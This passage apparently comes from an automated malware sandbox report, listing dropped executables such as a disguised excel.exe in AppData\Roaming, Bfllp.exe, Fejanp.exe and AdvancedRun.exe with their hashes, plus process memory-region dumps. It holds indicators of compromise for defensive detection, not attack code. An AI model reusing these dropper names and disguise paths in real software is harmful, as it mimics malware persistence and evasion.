    2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

  • \PROGRA~2\Google\Temp\GUMBFA6.tmp\GOFB2B~1.EXE
    MD5

    583ff3367e050c4d62bc03516473b40a

    SHA1

    6aa1d26352b78310e711884829c35a69ed1bf0f9

    SHA256

    6b63f8dd47d8b3baa71b6cd205d428861b96bf09cf479071e75ddd23f97c0146

    SHA512

    e9bdd5cc2e29db48cc524488fbadb08e808f17f6e18fa595cfebae229c94f2547079e52a2ada214169577b89b2ffbef424729cd90acdea3774f5c76aec192be0

  • \PROGRA~2\Google\Update\1335~1.452\GOFB2B~1.EXE
    MD5

    583ff3367e050c4d62bc03516473b40a

    SHA1

    6aa1d26352b78310e711884829c35a69ed1bf0f9

    SHA256

    6b63f8dd47d8b3baa71b6cd205d428861b96bf09cf479071e75ddd23f97c0146

    SHA512

    e9bdd5cc2e29db48cc524488fbadb08e808f17f6e18fa595cfebae229c94f2547079e52a2ada214169577b89b2ffbef424729cd90acdea3774f5c76aec192be0

  • \Users\Admin\AppData\Local\Temp\3582-490\Fejanp.exe
    MD5

    4002e78d30d455d41d4d7657ebd80aaa

    SHA1

    f9327ee332dd868b9b20cea5f95a51cbc2ce4afe

    SHA256

    c3d42a1c484ea9bf50c0de1c356dee5dc83541caff8e3acea4b396b13bf1d06f

    SHA512

    01b044a2f23f3ea38ce67f760744d4508a17ceef69b97c0d58368b31a9f8dd124b07bfcd9331ad9007edaa351bf303f952f479c398dd3a1ada5142a1ced6e9ed

  • \Users\Admin\AppData\Local\Temp\Bfllp.exe
    MD5

    b3b986214fdf210585adaf1cd74e9616

    SHA1

    2c9d727fdd3cfbaf34d45dcd8ff8fa537c21e771

    SHA256

    5c5fe5f046660da5c3784b3bf03111dd5dcb3e5fa8dd4ce94acc66f4d960a0cc

    SHA512

    3a4b37a8e4da4a4584b56a9a87cd38cb83bda5ce9fe1e701bc346855a712038e9c581e73a6f2c2f0ac9732dba3964aa158de7f880fef69cacb00e7d14725fa53

  • \Users\Admin\AppData\Local\Temp\Bfllp.exe
    MD5

    b3b986214fdf210585adaf1cd74e9616

    SHA1

    2c9d727fdd3cfbaf34d45dcd8ff8fa537c21e771

    SHA256

    5c5fe5f046660da5c3784b3bf03111dd5dcb3e5fa8dd4ce94acc66f4d960a0cc

    SHA512

    3a4b37a8e4da4a4584b56a9a87cd38cb83bda5ce9fe1e701bc346855a712038e9c581e73a6f2c2f0ac9732dba3964aa158de7f880fef69cacb00e7d14725fa53

  • \Users\Admin\AppData\Local\Temp\Bfllp.exe
    MD5

    b3b986214fdf210585adaf1cd74e9616

    SHA1

    2c9d727fdd3cfbaf34d45dcd8ff8fa537c21e771

    SHA256

    5c5fe5f046660da5c3784b3bf03111dd5dcb3e5fa8dd4ce94acc66f4d960a0cc

    SHA512

    3a4b37a8e4da4a4584b56a9a87cd38cb83bda5ce9fe1e701bc346855a712038e9c581e73a6f2c2f0ac9732dba3964aa158de7f880fef69cacb00e7d14725fa53

  • \Users\Admin\AppData\Local\Temp\Fejanp.exe
    MD5

    e97bc72e803c3c3cdc35fc13274bf0ad

    SHA1

    8f262f8a90cbe8438c0b28afe9bd22c0695c698c

    SHA256

    55dda38d22d983035b6b6f8d2c9c5c299e99295745538b45d1a468864dbceb3e

    SHA512

    74fccc37e2b024d2c4630fe3cb7455a9f144902847a4207ea7502bc79250bd79773eb22fe26e11f821c238f0f061dbe0883d81ee9df5fc69d17bf277633842f9

  • \Users\Admin\AppData\Local\Temp\Fejanp.exe
    MD5

    e97bc72e803c3c3cdc35fc13274bf0ad

    SHA1

    8f262f8a90cbe8438c0b28afe9bd22c0695c698c

    SHA256

    55dda38d22d983035b6b6f8d2c9c5c299e99295745538b45d1a468864dbceb3e

    SHA512

    74fccc37e2b024d2c4630fe3cb7455a9f144902847a4207ea7502bc79250bd79773eb22fe26e11f821c238f0f061dbe0883d81ee9df5fc69d17bf277633842f9

  • \Users\Admin\AppData\Local\Temp\Fejanp.exe
    MD5

    e97bc72e803c3c3cdc35fc13274bf0ad

    SHA1

    8f262f8a90cbe8438c0b28afe9bd22c0695c698c

    SHA256

    55dda38d22d983035b6b6f8d2c9c5c299e99295745538b45d1a468864dbceb3e

    SHA512

    74fccc37e2b024d2c4630fe3cb7455a9f144902847a4207ea7502bc79250bd79773eb22fe26e11f821c238f0f061dbe0883d81ee9df5fc69d17bf277633842f9

  • \Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
    MD5

    17fc12902f4769af3a9271eb4e2dacce

    SHA1

    9a4a1581cc3971579574f837e110f3bd6d529dab

    SHA256

    29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

    SHA512

    036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • \Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
    MD5

    17fc12902f4769af3a9271eb4e2dacce

    SHA1

    9a4a1581cc3971579574f837e110f3bd6d529dab

    SHA256

    29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

    SHA512

    036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • \Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
    MD5

    17fc12902f4769af3a9271eb4e2dacce

    SHA1

    9a4a1581cc3971579574f837e110f3bd6d529dab

    SHA256

    29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

    SHA512

    036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • \Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
    MD5

    17fc12902f4769af3a9271eb4e2dacce

    SHA1

    9a4a1581cc3971579574f837e110f3bd6d529dab

    SHA256

    29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

    SHA512

    036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • \Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • \Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • \Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • \Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • \Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • \Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • \Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • \Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • memory/268-5-0x0000000000000000-mapping.dmp
  • memory/368-13-0x0000000002500000-0x0000000002501000-memory.dmp
    Filesize

    4KB

  • memory/368-17-0x0000000006010000-0x0000000006011000-memory.dmp
    Filesize

    4KB

  • memory/368-9-0x0000000002270000-0x0000000002271000-memory.dmp
    Filesize

    4KB

  • memory/368-10-0x0000000004890000-0x0000000004891000-memory.dmp
    Filesize

    4KB

  • memory/368-11-0x0000000004850000-0x0000000004851000-memory.dmp
    Filesize

    4KB

  • memory/368-12-0x0000000004852000-0x0000000004853000-memory.dmp
    Filesize

    4KB

  • memory/368-32-0x00000000062C0000-0x00000000062C1000-memory.dmp
    Filesize

    4KB

  • memory/368-6-0x0000000000000000-mapping.dmp
  • memory/368-14-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

  • memory/368-8-0x000000006C650000-0x000000006CD3E000-memory.dmp
    Filesize

    6.9MB

  • memory/368-22-0x0000000006080000-0x0000000006081000-memory.dmp
    Filesize

    4KB

  • memory/368-23-0x00000000060F0000-0x00000000060F1000-memory.dmp
    Filesize

    4KB

  • memory/368-31-0x0000000006250000-0x0000000006251000-memory.dmp
    Filesize

    4KB

  • memory/368-24-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

  • memory/368-7-0x00000000765A1000-0x00000000765A3000-memory.dmp
    Filesize

    8KB

  • memory/756-45-0x0000000000000000-mapping.dmp
  • memory/756-66-0x00000000010F2000-0x00000000010F3000-memory.dmp
    Filesize

    4KB

  • memory/756-57-0x000000006C650000-0x000000006CD3E000-memory.dmp
    Filesize

    6.9MB

  • memory/756-65-0x00000000010F0000-0x00000000010F1000-memory.dmp
    Filesize

    4KB

  • memory/772-120-0x0000000000000000-mapping.dmp
  • memory/1060-37-0x000000006C650000-0x000000006CD3E000-memory.dmp
    Filesize

    6.9MB

  • memory/1060-34-0x0000000000000000-mapping.dmp
  • memory/1060-41-0x0000000005290000-0x0000000005332000-memory.dmp
    Filesize

    648KB

  • memory/1060-38-0x0000000000E30000-0x0000000000E31000-memory.dmp
    Filesize

    4KB

  • memory/1060-40-0x0000000000D80000-0x0000000000D81000-memory.dmp
    Filesize

    4KB

  • memory/1312-128-0x0000000000000000-mapping.dmp
  • memory/1368-160-0x0000000000000000-mapping.dmp
  • memory/1388-189-0x0000000000720000-0x0000000000721000-memory.dmp
    Filesize

    4KB

  • memory/1388-186-0x0000000002050000-0x0000000002061000-memory.dmp
    Filesize

    68KB

  • memory/1388-185-0x0000000000000000-mapping.dmp
  • memory/1576-133-0x0000000002710000-0x0000000002711000-memory.dmp
    Filesize

    4KB

  • memory/1576-134-0x0000000004A50000-0x0000000004A51000-memory.dmp
    Filesize

    4KB

  • memory/1576-126-0x000000006C650000-0x000000006CD3E000-memory.dmp
    Filesize

    6.9MB

  • memory/1576-130-0x0000000004A90000-0x0000000004A91000-memory.dmp
    Filesize

    4KB

  • memory/1576-131-0x0000000004A92000-0x0000000004A93000-memory.dmp
    Filesize

    4KB

  • memory/1576-129-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
    Filesize

    4KB

  • memory/1576-123-0x0000000000000000-mapping.dmp
  • memory/1604-146-0x0000000004952000-0x0000000004953000-memory.dmp
    Filesize

    4KB

  • memory/1604-56-0x000000006C650000-0x000000006CD3E000-memory.dmp
    Filesize

    6.9MB

  • memory/1604-64-0x0000000004950000-0x0000000004951000-memory.dmp
    Filesize

    4KB

  • memory/1604-44-0x0000000000000000-mapping.dmp
  • memory/1616-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1616-2-0x000000002F0C1000-0x000000002F0C4000-memory.dmp
    Filesize

    12KB

  • memory/1616-3-0x0000000071A81000-0x0000000071A83000-memory.dmp
    Filesize

    8KB

  • memory/1636-114-0x0000000000000000-mapping.dmp
  • memory/1744-183-0x0000000004B90000-0x0000000004B91000-memory.dmp
    Filesize

    4KB

  • memory/1744-176-0x0000000000840000-0x0000000000841000-memory.dmp
    Filesize

    4KB

  • memory/1744-175-0x000000006C650000-0x000000006CD3E000-memory.dmp
    Filesize

    6.9MB

  • memory/1744-171-0x0000000000000000-mapping.dmp
  • memory/1768-157-0x0000000000490000-0x0000000000491000-memory.dmp
    Filesize

    4KB

  • memory/1768-149-0x0000000000000000-mapping.dmp
  • memory/1768-150-0x0000000002220000-0x0000000002231000-memory.dmp
    Filesize

    68KB

  • memory/1864-155-0x00000000022C0000-0x00000000022C1000-memory.dmp
    Filesize

    4KB

  • memory/1864-136-0x0000000000400000-0x0000000000436000-memory.dmp
    Filesize

    216KB

  • memory/1864-137-0x000000000042F7BE-mapping.dmp
  • memory/1864-139-0x000000006C650000-0x000000006CD3E000-memory.dmp
    Filesize

    6.9MB

  • memory/1864-140-0x0000000000400000-0x0000000000436000-memory.dmp
    Filesize

    216KB

  • memory/1932-97-0x0000000006300000-0x0000000006301000-memory.dmp
    Filesize

    4KB

  • memory/1932-79-0x00000000057B0000-0x00000000057B1000-memory.dmp
    Filesize

    4KB

  • memory/1932-82-0x0000000006260000-0x0000000006261000-memory.dmp
    Filesize

    4KB

  • memory/1932-53-0x0000000004A20000-0x0000000004A21000-memory.dmp
    Filesize

    4KB

  • memory/1932-42-0x0000000000000000-mapping.dmp
  • memory/1932-51-0x0000000004A60000-0x0000000004A61000-memory.dmp
    Filesize

    4KB

  • memory/1932-50-0x0000000000C40000-0x0000000000C41000-memory.dmp
    Filesize

    4KB

  • memory/1932-61-0x0000000002610000-0x0000000002611000-memory.dmp
    Filesize

    4KB

  • memory/1932-48-0x000000006C650000-0x000000006CD3E000-memory.dmp
    Filesize

    6.9MB

  • memory/1932-54-0x0000000004A22000-0x0000000004A23000-memory.dmp
    Filesize

    4KB

  • memory/1932-63-0x0000000005410000-0x0000000005411000-memory.dmp
    Filesize

    4KB

  • memory/1932-98-0x0000000006310000-0x0000000006311000-memory.dmp
    Filesize

    4KB

  • memory/1952-132-0x0000000000000000-mapping.dmp
  • memory/1996-165-0x0000000000000000-mapping.dmp
  • memory/1996-178-0x0000000000210000-0x0000000000211000-memory.dmp
    Filesize

    4KB